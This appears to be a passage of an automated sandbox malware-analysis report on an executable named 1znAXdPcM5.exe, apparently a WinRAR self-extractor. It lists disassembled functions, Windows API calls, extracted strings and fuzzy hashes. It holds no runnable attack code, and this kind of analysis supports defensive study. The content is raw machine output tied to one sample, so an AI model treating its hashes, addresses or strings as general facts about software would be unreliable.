                                                                                                                    • Opcode ID: 3baa66c09d347e702cb9f522cadccff2c885f4937c2c5c1944ea986dad0de098
                                                                                                                    • Instruction ID: 5348ef7890a5e59c457de5d91caeca47897b475991652e32715eb9a2d6844666
                                                                                                                    • Opcode Fuzzy Hash: 3baa66c09d347e702cb9f522cadccff2c885f4937c2c5c1944ea986dad0de098
                                                                                                                    • Instruction Fuzzy Hash: 1CF01D32048015BBCF226F51EC0DD8E7F6AFB95760F118415F61A6F062CB729665D690
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    • Opcode ID: 916b3efbdb750f34f3b669ec5189a26b287e78943f3a3e3fc963dbf4100ad327
                                                                                                                    • Instruction ID: 96ab1e24bd20215fc5c646dc68cb02dff1ebfb0e2b52ebcbf39c364ada9c3011
                                                                                                                    • Opcode Fuzzy Hash: 916b3efbdb750f34f3b669ec5189a26b287e78943f3a3e3fc963dbf4100ad327
                                                                                                                    • Instruction Fuzzy Hash: 2951B435688B23F6FE212B90CE4BF257E69BB05B04F284D06F786644E1D5A2A4107B1E
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1znAXdPcM5.exe,00000104), ref: 005A7FAE
                                                                                                                    • _free.LIBCMT ref: 005A8079
                                                                                                                    • _free.LIBCMT ref: 005A8083
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                    • API String ID: 2506810119-933696318
                                                                                                                    • Opcode ID: 0760612ca6d3c4feb8e03f69e332188eef5af67b58c662a21dcb93722a700fa7
                                                                                                                    • Instruction ID: 7cc0219d6c551cb6ebf0c68d45c17e36008fe59a55b70fe5fc4d98cd623a13fe
                                                                                                                    • Opcode Fuzzy Hash: 0760612ca6d3c4feb8e03f69e332188eef5af67b58c662a21dcb93722a700fa7
                                                                                                                    • Instruction Fuzzy Hash: F831BFB1A00259AFDB25DF99DC899AEBFFCFF96310F104166F4049B211DA708E48CB61
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005A31FB
                                                                                                                    • _abort.LIBCMT ref: 005A3306
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    • Opcode ID: 2a6f49172b4df83a8e43fe5d83eb6cd6723bdbe6817155c28d90579d25cccf31
                                                                                                                    • Instruction ID: becc471eb38831278b42923c7cedf0bcb24d40fea14e8c998d7d6736f8ed739a
                                                                                                                    • Opcode Fuzzy Hash: 2a6f49172b4df83a8e43fe5d83eb6cd6723bdbe6817155c28d90579d25cccf31
                                                                                                                    • Instruction Fuzzy Hash: E0414A75900209AFCF15DF98CD81AEEBFB5BF4A308F148199FA04A7251D335EA50DB50
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00587406
                                                                                                                      • Part of subcall function 00583BBA: __EH_prolog.LIBCMT ref: 00583BBF
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 005874CD
                                                                                                                      • Part of subcall function 00587A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00587AAB
                                                                                                                      • Part of subcall function 00587A9C: GetLastError.KERNEL32 ref: 00587AF1
                                                                                                                      • Part of subcall function 00587A9C: CloseHandle.KERNEL32(?), ref: 00587B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    • Opcode ID: 34f7e90f6bf8d66b724ee2762ee9b245185ab1a7675eff36d434041c1dfe356b
                                                                                                                    • Instruction ID: 94cbf66c013a11a2501f139ad384ca9662fc02409524317947d3f4a3050af472
                                                                                                                    • Opcode Fuzzy Hash: 34f7e90f6bf8d66b724ee2762ee9b245185ab1a7675eff36d434041c1dfe356b
                                                                                                                    • Instruction Fuzzy Hash: 0031D07190424DAFEF11FBA48C4AFEE7FA9BB59300F104055F845B7292DB749A488B60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0059ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0059ADC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    • Opcode ID: 9cd8d84feb3c5efa228e93bf620e85d4a01ac91efaae9269bf6d2d69128c25a7
                                                                                                                    • Instruction ID: 21d4feec9ccdc525954c6d65caf1613eba2e07506fa9edbfaaad7d34a923eb91
                                                                                                                    • Opcode Fuzzy Hash: 9cd8d84feb3c5efa228e93bf620e85d4a01ac91efaae9269bf6d2d69128c25a7
                                                                                                                    • Instruction Fuzzy Hash: E711D632240700AFDB159F68DD4DF6A3F69FB5A702F100810F685EB4A0C7619D49A7B6
                                                                                                                    APIs
                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010448,0059B270,?,?), ref: 0059DE18
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogParam
                                                                                                                    • String ID: GETPASSWORD1$rY$xz]
                                                                                                                    • API String ID: 665744214-2500144767
                                                                                                                    • Opcode ID: 050186092eb2bac4d90414507aec88f58d16d418eb82ae02e7a6fdcf551cb74c
                                                                                                                    • Instruction ID: 9647bd91edca9ae292e0cf80b61654863e05396b3809fc0afe947f792dfd996c
                                                                                                                    • Opcode Fuzzy Hash: 050186092eb2bac4d90414507aec88f58d16d418eb82ae02e7a6fdcf551cb74c
                                                                                                                    • Instruction Fuzzy Hash: EE113B32600244AEDF21DA34AC89FAB3FA8B719311F144425FD49AB080CBB0AC48D370
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 0058D954
                                                                                                                    • _strncpy.LIBCMT ref: 0058D99A
                                                                                                                      • Part of subcall function 00591DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,005C1030,00000200,0058D928,00000000,?,00000050,005C1030), ref: 00591DC4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: 6861d69a8438a5a8fecd05a0b00ef898952b194672c3d563d2a98c9bea17e3be
                                                                                                                    • Instruction ID: 3bd2ecfd7895e8c82a575b034dbe63ff13bb73620c513fb7c51472736eaeffe8
                                                                                                                    • Opcode Fuzzy Hash: 6861d69a8438a5a8fecd05a0b00ef898952b194672c3d563d2a98c9bea17e3be
                                                                                                                    • Instruction Fuzzy Hash: EC215E72540249AADF21EEA4CC46FEE7FF8BB45704F140512FD10A61E2E272E6488B61
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0058AC5A,00000008,?,00000000,?,0058D22D,?,00000000), ref: 00590E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0058AC5A,00000008,?,00000000,?,0058D22D,?,00000000), ref: 00590E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0058AC5A,00000008,?,00000000,?,0058D22D,?,00000000), ref: 00590E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00590EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: 68f035126789f0009ed84bb40128427a30a1bd4df73dcab77f6f2c2d816f2a4f
                                                                                                                    • Instruction ID: 9098cc2b66bdce8cb04f14fc72b8e7452016f0d3560ab5e012401873019d9814
                                                                                                                    • Opcode Fuzzy Hash: 68f035126789f0009ed84bb40128427a30a1bd4df73dcab77f6f2c2d816f2a4f
                                                                                                                    • Instruction Fuzzy Hash: D61191B16007089FC3215F669C889A7FFECFB65744F144C2EF1DAC2240D671A9408B54
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Malloc
                                                                                                                    • String ID: (Y$2Y$A
                                                                                                                    • API String ID: 2696272793-4269916927
                                                                                                                    • Opcode ID: 6976bd7f410eeccffe7ade0d111d7708d41d444c7de422a8e892900e880b5213
                                                                                                                    • Instruction ID: 46b6ec591777f0731c6a7f5cd8df67ca36e76afdd49264b66b8f7119c87e4553
                                                                                                                    • Opcode Fuzzy Hash: 6976bd7f410eeccffe7ade0d111d7708d41d444c7de422a8e892900e880b5213
                                                                                                                    • Instruction Fuzzy Hash: D0011B75901219ABCB14DFA5D8489DEBBF8BF09310B10415AE906E7200D7349E45DF94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: b2a9df8769c670b7f9d04aaf270851559a88270591fa342da10bed9a300b197b
                                                                                                                    • Instruction ID: eb7532b164f96645c257fb7537cb6f62ea69229649cb8d894210f971be810066
                                                                                                                    • Opcode Fuzzy Hash: b2a9df8769c670b7f9d04aaf270851559a88270591fa342da10bed9a300b197b
                                                                                                                    • Instruction Fuzzy Hash: 39019E76A04745AFCF249F54EC88EA63FB8F729398B000426F80597231C6319858FBB0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058E2E8: _swprintf.LIBCMT ref: 0058E30E
                                                                                                                      • Part of subcall function 0058E2E8: _strlen.LIBCMT ref: 0058E32F
                                                                                                                      • Part of subcall function 0058E2E8: SetDlgItemTextW.USER32(?,005BE274,?), ref: 0058E38F
                                                                                                                      • Part of subcall function 0058E2E8: GetWindowRect.USER32(?,?), ref: 0058E3C9
                                                                                                                      • Part of subcall function 0058E2E8: GetClientRect.USER32(?,?), ref: 0058E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                    • SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: Y$0
                                                                                                                    • API String ID: 2622349952-400418000
                                                                                                                    • Opcode ID: 0a07e193eb9932e8f28680f6652d84ea9e679c1f238a61211d0094d49c15b9b5
                                                                                                                    • Instruction ID: 246aaffecc3ba87606e69ddcb1de4df31a2964cc3044a94c05524eae5d010d2e
                                                                                                                    • Opcode Fuzzy Hash: 0a07e193eb9932e8f28680f6652d84ea9e679c1f238a61211d0094d49c15b9b5
                                                                                                                    • Instruction Fuzzy Hash: F9F08130104A88ABDF196F50880EBE93FACBB50344F044918FC8675591CF74C995EB14
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction ID: 7021a1ba3c6b9ce4073ed611a0372cdbca66371bb727c03a257ddaff23951da9
                                                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction Fuzzy Hash: 0AA137769047A69FEB21CF28C8917AEFFE5FF56320F28456DE4859B281C2389D41C760
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00587F69,?,?,?), ref: 0058A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00587F69,?), ref: 0058A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00587F69,?,?,?,?,?,?,?), ref: 0058A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00587F69,?,?,?,?,?,?,?,?,?,?), ref: 0058A4C6
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: 2514d90d4fda26eac3e30cecd2065785b520138b5f90ea9d5337bdf511513ae2
                                                                                                                    • Instruction ID: 852b99a4a325af55a244cd4379734596230ee3a4782b30abaeec93eac475cd35
                                                                                                                    • Opcode Fuzzy Hash: 2514d90d4fda26eac3e30cecd2065785b520138b5f90ea9d5337bdf511513ae2
                                                                                                                    • Instruction Fuzzy Hash: 054195311483819AEB31EF24DC49F9EBFE4AF95700F140D1EB9D1A3191DAA49A48DB53
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,005A91E0,?,00000000,?,00000001,?,?,00000001,005A91E0,?), ref: 005AC9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005ACA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,005A6CBE,?), ref: 005ACA70
                                                                                                                    • __freea.LIBCMT ref: 005ACA79
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 32dbba3d2f756e31aa8c216fcc6fb69cd81867b9bd9d4ae696fdd7b87a0a187d
                                                                                                                    • Instruction ID: 9309c5737382fa38c9c07405376725385b4bc5401e3dc39feff30a1e365b79dc
                                                                                                                    • Opcode Fuzzy Hash: 32dbba3d2f756e31aa8c216fcc6fb69cd81867b9bd9d4ae696fdd7b87a0a187d
                                                                                                                    • Instruction Fuzzy Hash: EB318D72A0021AABDF25DF64DC45DBE7FA6FB42310B144268FC05E6290EB35DD54DBA0
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0059A666
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0059A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0059A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0059A691
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 77892e339194a4f77d200b8eecaec5995080b578a06c452f25a08bfd2714920d
                                                                                                                    • Instruction ID: 62ddcfd9150be4d9ac17104135a238a5efaec287da49c6df507b187cae66588e
                                                                                                                    • Opcode Fuzzy Hash: 77892e339194a4f77d200b8eecaec5995080b578a06c452f25a08bfd2714920d
                                                                                                                    • Instruction Fuzzy Hash: 8EE01231942B71BBD7695B60BC8DF9B3E54AB25B53F010101FA459F1D0DB7486089BE1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: .lnk$dY
                                                                                                                    • API String ID: 2691759472-3084174456
                                                                                                                    • Opcode ID: 8ca2e8c3b383e9957781c66e501cb3b4c58bd677381b1104b9315692a8b94713
                                                                                                                    • Instruction ID: 5967bf7467e488afcbb3e19d62807da723fa7b71fb0fa46ba3486d494d1637f6
                                                                                                                    • Opcode Fuzzy Hash: 8ca2e8c3b383e9957781c66e501cb3b4c58bd677381b1104b9315692a8b94713
                                                                                                                    • Instruction Fuzzy Hash: BEA1517690012A9ADF24EBA4CD49EFA77FCBF44304F0885A2B509E7141EF749B848B71
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 005875E3
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                      • Part of subcall function 0058A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0058A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0058777F
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A501
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A532
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: *
                                                                                                                    • API String ID: 2691759472-163128923
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0058F2E4
                                                                                                                      • Part of subcall function 0058F2C5: GetProcAddress.KERNEL32(005C81C8,CryptUnprotectMemory), ref: 0058F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0058F33E), ref: 0058F3D2
                                                                                                                    Strings
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0058F3CA
                                                                                                                    • CryptProtectMemory failed, xrefs: 0058F389
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00591160,?,00000000,00000000), ref: 00591043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0059108A
                                                                                                                      • Part of subcall function 00586C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00586C54
                                                                                                                      • Part of subcall function 00586DCB: _wcschr.LIBVCRUNTIME ref: 00586E0A
                                                                                                                      • Part of subcall function 00586DCB: _wcschr.LIBVCRUNTIME ref: 00586E19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr
                                                                                                                    • String ID: <9[$?*<>|"
                                                                                                                    • API String ID: 2691759472-2631332886
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: Software\WinRAR SFX$Y
                                                                                                                    • API String ID: 176396367-2819317119
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0058C29A: _wcslen.LIBCMT ref: 0058C2A2
